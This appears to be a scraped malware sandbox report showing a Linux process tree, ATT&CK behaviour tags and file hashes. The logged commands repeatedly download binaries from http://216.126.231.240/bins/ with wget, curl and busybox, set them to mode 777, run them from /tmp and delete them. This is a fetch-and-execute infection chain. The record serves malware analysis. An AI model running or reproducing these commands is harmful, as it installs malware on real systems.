- Executes dropped EXE
PID:933
-
-
/bin/rmrm 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:934
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:935
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:937
-
-
/bin/chmodchmod 777 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm./uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:940
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:941
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:943
-
-
/bin/chmodchmod 777 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK./Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:946
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:947
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:949
-
-
/bin/chmodchmod 777 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8./8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:952
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:953
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:955
-
-
/bin/chmodchmod 777 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE./zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:958
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:959
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:961
-
-
/bin/chmodchmod 777 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp./5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:964
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:965
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:967
-
-
/bin/chmodchmod 777 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ./kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:970
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:971
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:973
-
-
/bin/chmodchmod 777 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7./pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:976
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:977
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97